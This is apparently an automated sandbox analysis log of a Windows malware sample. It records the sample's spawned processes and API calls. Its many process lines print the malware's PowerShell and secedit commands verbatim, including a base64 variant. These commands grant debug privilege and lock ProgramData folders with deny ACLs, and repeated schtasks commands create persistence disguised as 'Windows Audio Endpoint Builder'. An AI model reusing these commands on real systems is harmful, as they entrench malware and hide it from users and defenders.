                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));Jump to behavior
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe "C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe"
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log /quiet
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.log /quiet
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.log /quiet
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log /quiet
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log /quiet
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.log /quiet
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.log /quiet
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -c "set-content -value @('[unicode]','unicode=yes','[version]','signature=\"$chicago$\"','revision=1','[privilege rights]','sedebugprivilege = *s-1-5-18','[file security]','\"c:\programdata\program\",0,\"d:ar(d;oici;dtsdrcwd;;;wd)\"') -path ([io.path]::combine($env:temp, 'sedebugprivilege1.inf')) -encoding unicode; secedit.exe /configure /db ([io.path]::combine($env:temp, 'sedebugprivilege1.sdb')) /cfg ([io.path]::combine($env:temp, 'sedebugprivilege1.inf')) /overwrite /log ([io.path]::combine($env:temp, 'sedebugprivilege1.log')) /quiet; remove-item -path ([io.path]::combine($env:temp, 'sedebugprivilege1.*')) -force;"
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -c "set-content -value @('[unicode]','unicode=yes','[version]','signature=\"$chicago$\"','revision=1','[privilege rights]','sedebugprivilege = *s-1-5-18','[file security]','\"c:\programdata\data\",0,\"d:ar(d;oici;dtsdrcwd;;;wd)\"') -path ([io.path]::combine($env:temp, 'sedebugprivilege3.inf')) -encoding unicode; secedit.exe /configure /db ([io.path]::combine($env:temp, 'sedebugprivilege3.sdb')) /cfg ([io.path]::combine($env:temp, 'sedebugprivilege3.inf')) /overwrite /log ([io.path]::combine($env:temp, 'sedebugprivilege3.log')) /quiet; remove-item -path ([io.path]::combine($env:temp, 'sedebugprivilege3.*')) -force;"
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -c "[io.file]::writeallbytes([io.path]::combine($env:temp, 'sedebugprivilege4.inf'), [convert]::frombase64string('//5bafuabgbpagmabwbkaguaxqanaaoavqbuagkaywbvagqazqa9ahkazqbzaa0acgbbafyazqbyahmaaqbvag4axqanaaoacwbpagcabgbhahqadqbyaguapqaiacqaqwbiaekaqwbbaecatwakaciadqakafiazqb2agkacwbpag8abga9adeadqakafsauabyagkadgbpagwazqbnaguaiabsagkazwboahqacwbdaa0acgbtaguarablagiadqbnafaacgbpahyaaqbsaguazwblacaapqagacoauwatadealqa1ac0amqa4aa0acga=')); secedit.exe /configure /db ([io.path]::combine($env:temp, 'sedebugprivilege4.sdb')) /cfg ([io.path]::combine($env:temp, 'sedebugprivilege4.inf')) /overwrite /log ([io.path]::combine($env:temp, 'sedebugprivilege4.log')) /quiet; remove-item -path ([io.path]::combine($env:temp, 'sedebugprivilege4.*')) -force;"
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -c "set-content -value @('[unicode]','unicode=yes','[version]','signature=\"$chicago$\"','revision=1','[privilege rights]','sedebugprivilege = *s-1-5-18','[file security]','\"c:\programdata\program\",0,\"d:ar(d;oici;dtsdrcwd;;;wd)\"') -path ([io.path]::combine($env:temp, 'sedebugprivilege1.inf')) -encoding unicode; secedit.exe /configure /db ([io.path]::combine($env:temp, 'sedebugprivilege1.sdb')) /cfg ([io.path]::combine($env:temp, 'sedebugprivilege1.inf')) /overwrite /log ([io.path]::combine($env:temp, 'sedebugprivilege1.log')) /quiet; remove-item -path ([io.path]::combine($env:temp, 'sedebugprivilege1.*')) -force;"
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -c "set-content -value @('[unicode]','unicode=yes','[version]','signature=\"$chicago$\"','revision=1','[privilege rights]','sedebugprivilege = *s-1-5-18','[file security]','\"c:\programdata\program\",0,\"d:ar(d;oici;dtsdrcwd;;;wd)\"') -path ([io.path]::combine($env:temp, 'sedebugprivilege1.inf')) -encoding unicode; secedit.exe /configure /db ([io.path]::combine($env:temp, 'sedebugprivilege1.sdb')) /cfg ([io.path]::combine($env:temp, 'sedebugprivilege1.inf')) /overwrite /log ([io.path]::combine($env:temp, 'sedebugprivilege1.log')) /quiet; remove-item -path ([io.path]::combine($env:temp, 'sedebugprivilege1.*')) -force;"
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -c "set-content -value @('[unicode]','unicode=yes','[version]','signature=\"$chicago$\"','revision=1','[privilege rights]','sedebugprivilege = *s-1-5-18','[file security]','\"c:\programdata\data\",0,\"d:ar(d;oici;dtsdrcwd;;;wd)\"') -path ([io.path]::combine($env:temp, 'sedebugprivilege3.inf')) -encoding unicode; secedit.exe /configure /db ([io.path]::combine($env:temp, 'sedebugprivilege3.sdb')) /cfg ([io.path]::combine($env:temp, 'sedebugprivilege3.inf')) /overwrite /log ([io.path]::combine($env:temp, 'sedebugprivilege3.log')) /quiet; remove-item -path ([io.path]::combine($env:temp, 'sedebugprivilege3.*')) -force;"
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -c "[io.file]::writeallbytes([io.path]::combine($env:temp, 'sedebugprivilege4.inf'), [convert]::frombase64string('//5bafuabgbpagmabwbkaguaxqanaaoavqbuagkaywbvagqazqa9ahkazqbzaa0acgbbafyazqbyahmaaqbvag4axqanaaoacwbpagcabgbhahqadqbyaguapqaiacqaqwbiaekaqwbbaecatwakaciadqakafiazqb2agkacwbpag8abga9adeadqakafsauabyagkadgbpagwazqbnaguaiabsagkazwboahqacwbdaa0acgbtaguarablagiadqbnafaacgbpahyaaqbsaguazwblacaapqagacoauwatadealqa1ac0amqa4aa0acga=')); secedit.exe /configure /db ([io.path]::combine($env:temp, 'sedebugprivilege4.sdb')) /cfg ([io.path]::combine($env:temp, 'sedebugprivilege4.inf')) /overwrite /log ([io.path]::combine($env:temp, 'sedebugprivilege4.log')) /quiet; remove-item -path ([io.path]::combine($env:temp, 'sedebugprivilege4.*')) -force;"
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -c "set-content -value @('[unicode]','unicode=yes','[version]','signature=\"$chicago$\"','revision=1','[privilege rights]','sedebugprivilege = *s-1-5-18','[file security]','\"c:\programdata\data\",0,\"d:ar(d;oici;dtsdrcwd;;;wd)\"') -path ([io.path]::combine($env:temp, 'sedebugprivilege3.inf')) -encoding unicode; secedit.exe /configure /db ([io.path]::combine($env:temp, 'sedebugprivilege3.sdb')) /cfg ([io.path]::combine($env:temp, 'sedebugprivilege3.inf')) /overwrite /log ([io.path]::combine($env:temp, 'sedebugprivilege3.log')) /quiet; remove-item -path ([io.path]::combine($env:temp, 'sedebugprivilege3.*')) -force;"Jump to behavior
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -c "set-content -value @('[unicode]','unicode=yes','[version]','signature=\"$chicago$\"','revision=1','[privilege rights]','sedebugprivilege = *s-1-5-18','[file security]','\"c:\programdata\program\",0,\"d:ar(d;oici;dtsdrcwd;;;wd)\"') -path ([io.path]::combine($env:temp, 'sedebugprivilege1.inf')) -encoding unicode; secedit.exe /configure /db ([io.path]::combine($env:temp, 'sedebugprivilege1.sdb')) /cfg ([io.path]::combine($env:temp, 'sedebugprivilege1.inf')) /overwrite /log ([io.path]::combine($env:temp, 'sedebugprivilege1.log')) /quiet; remove-item -path ([io.path]::combine($env:temp, 'sedebugprivilege1.*')) -force;"
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -c "set-content -value @('[unicode]','unicode=yes','[version]','signature=\"$chicago$\"','revision=1','[privilege rights]','sedebugprivilege = *s-1-5-18','[file security]','\"c:\programdata\data\",0,\"d:ar(d;oici;dtsdrcwd;;;wd)\"') -path ([io.path]::combine($env:temp, 'sedebugprivilege3.inf')) -encoding unicode; secedit.exe /configure /db ([io.path]::combine($env:temp, 'sedebugprivilege3.sdb')) /cfg ([io.path]::combine($env:temp, 'sedebugprivilege3.inf')) /overwrite /log ([io.path]::combine($env:temp, 'sedebugprivilege3.log')) /quiet; remove-item -path ([io.path]::combine($env:temp, 'sedebugprivilege3.*')) -force;"
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -c "[io.file]::writeallbytes([io.path]::combine($env:temp, 'sedebugprivilege4.inf'), [convert]::frombase64string('//5bafuabgbpagmabwbkaguaxqanaaoavqbuagkaywbvagqazqa9ahkazqbzaa0acgbbafyazqbyahmaaqbvag4axqanaaoacwbpagcabgbhahqadqbyaguapqaiacqaqwbiaekaqwbbaecatwakaciadqakafiazqb2agkacwbpag8abga9adeadqakafsauabyagkadgbpagwazqbnaguaiabsagkazwboahqacwbdaa0acgbtaguarablagiadqbnafaacgbpahyaaqbsaguazwblacaapqagacoauwatadealqa1ac0amqa4aa0acga=')); secedit.exe /configure /db ([io.path]::combine($env:temp, 'sedebugprivilege4.sdb')) /cfg ([io.path]::combine($env:temp, 'sedebugprivilege4.inf')) /overwrite /log ([io.path]::combine($env:temp, 'sedebugprivilege4.log')) /quiet; remove-item -path ([io.path]::combine($env:temp, 'sedebugprivilege4.*')) -force;"
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -c "set-content -value @('[unicode]','unicode=yes','[version]','signature=\"$chicago$\"','revision=1','[privilege rights]','sedebugprivilege = *s-1-5-18','[file security]','\"c:\programdata\program\",0,\"d:ar(d;oici;dtsdrcwd;;;wd)\"') -path ([io.path]::combine($env:temp, 'sedebugprivilege1.inf')) -encoding unicode; secedit.exe /configure /db ([io.path]::combine($env:temp, 'sedebugprivilege1.sdb')) /cfg ([io.path]::combine($env:temp, 'sedebugprivilege1.inf')) /overwrite /log ([io.path]::combine($env:temp, 'sedebugprivilege1.log')) /quiet; remove-item -path ([io.path]::combine($env:temp, 'sedebugprivilege1.*')) -force;"
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -c "set-content -value @('[unicode]','unicode=yes','[version]','signature=\"$chicago$\"','revision=1','[privilege rights]','sedebugprivilege = *s-1-5-18','[file security]','\"c:\programdata\program\",0,\"d:ar(d;oici;dtsdrcwd;;;wd)\"') -path ([io.path]::combine($env:temp, 'sedebugprivilege1.inf')) -encoding unicode; secedit.exe /configure /db ([io.path]::combine($env:temp, 'sedebugprivilege1.sdb')) /cfg ([io.path]::combine($env:temp, 'sedebugprivilege1.inf')) /overwrite /log ([io.path]::combine($env:temp, 'sedebugprivilege1.log')) /quiet; remove-item -path ([io.path]::combine($env:temp, 'sedebugprivilege1.*')) -force;"
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -c "set-content -value @('[unicode]','unicode=yes','[version]','signature=\"$chicago$\"','revision=1','[privilege rights]','sedebugprivilege = *s-1-5-18','[file security]','\"c:\programdata\data\",0,\"d:ar(d;oici;dtsdrcwd;;;wd)\"') -path ([io.path]::combine($env:temp, 'sedebugprivilege3.inf')) -encoding unicode; secedit.exe /configure /db ([io.path]::combine($env:temp, 'sedebugprivilege3.sdb')) /cfg ([io.path]::combine($env:temp, 'sedebugprivilege3.inf')) /overwrite /log ([io.path]::combine($env:temp, 'sedebugprivilege3.log')) /quiet; remove-item -path ([io.path]::combine($env:temp, 'sedebugprivilege3.*')) -force;"
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -c "[io.file]::writeallbytes([io.path]::combine($env:temp, 'sedebugprivilege4.inf'), [convert]::frombase64string('//5bafuabgbpagmabwbkaguaxqanaaoavqbuagkaywbvagqazqa9ahkazqbzaa0acgbbafyazqbyahmaaqbvag4axqanaaoacwbpagcabgbhahqadqbyaguapqaiacqaqwbiaekaqwbbaecatwakaciadqakafiazqb2agkacwbpag8abga9adeadqakafsauabyagkadgbpagwazqbnaguaiabsagkazwboahqacwbdaa0acgbtaguarablagiadqbnafaacgbpahyaaqbsaguazwblacaapqagacoauwatadealqa1ac0amqa4aa0acga=')); secedit.exe /configure /db ([io.path]::combine($env:temp, 'sedebugprivilege4.sdb')) /cfg ([io.path]::combine($env:temp, 'sedebugprivilege4.inf')) /overwrite /log ([io.path]::combine($env:temp, 'sedebugprivilege4.log')) /quiet; remove-item -path ([io.path]::combine($env:temp, 'sedebugprivilege4.*')) -force;"
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeCode function: GetLocaleInfoA,GetLocaleInfoA,GetACP,2_2_0000000180037058
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeCode function: _getptd,GetLocaleInfoA,2_2_000000018003715C
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeCode function: GetLocaleInfoA,2_2_0000000180037244
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeCode function: _getptd,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,2_2_00000001800372F8
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeCode function: GetLocaleInfoA,2_2_000000018003D408
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeCode function: GetLocaleInfoW,2_2_000000018003A528
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeCode function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,free,GetLocaleInfoA,2_2_000000018003A584
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeCode function: _getptd,GetLocaleInfoA,2_2_000000018003758C
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeCode function: EnumSystemLocalesA,2_2_000000018003769C
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeCode function: EnumSystemLocalesA,2_2_0000000180037730
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeCode function: _getptd,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,_itow_s,2_2_000000018003779C
                              Source: C:\ProgramData\Program\iusb3mon.exeCode function: GetLocaleInfoW,28_2_001EA219
                              Source: C:\ProgramData\Program\iusb3mon.exeCode function: EnumSystemLocalesW,28_2_001E0E38
                              Source: C:\ProgramData\Program\iusb3mon.exeCode function: EnumSystemLocalesW,28_2_001E9E55
                              Source: C:\ProgramData\Program\iusb3mon.exeCode function: GetLocaleInfoW,28_2_001EA448
                              Source: C:\ProgramData\Program\iusb3mon.exeCode function: EnumSystemLocalesW,28_2_001E9EA0
                              Source: C:\ProgramData\Program\iusb3mon.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,28_2_001EA517
                              Source: C:\ProgramData\Program\iusb3mon.exeCode function: EnumSystemLocalesW,28_2_001E9F3B
                              Source: C:\ProgramData\Program\iusb3mon.exeCode function: GetLocaleInfoW,28_2_001E135E
                              Source: C:\ProgramData\Program\iusb3mon.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,28_2_001EA342
                              Source: C:\ProgramData\Program\iusb3mon.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,28_2_001E9BB3
                              Source: C:\ProgramData\Program\iusb3mon.exeCode function: GetLocaleInfoW,28_2_001E9DAE
                              Source: C:\ProgramData\Program\iusb3mon.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,28_2_001E9FC6
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
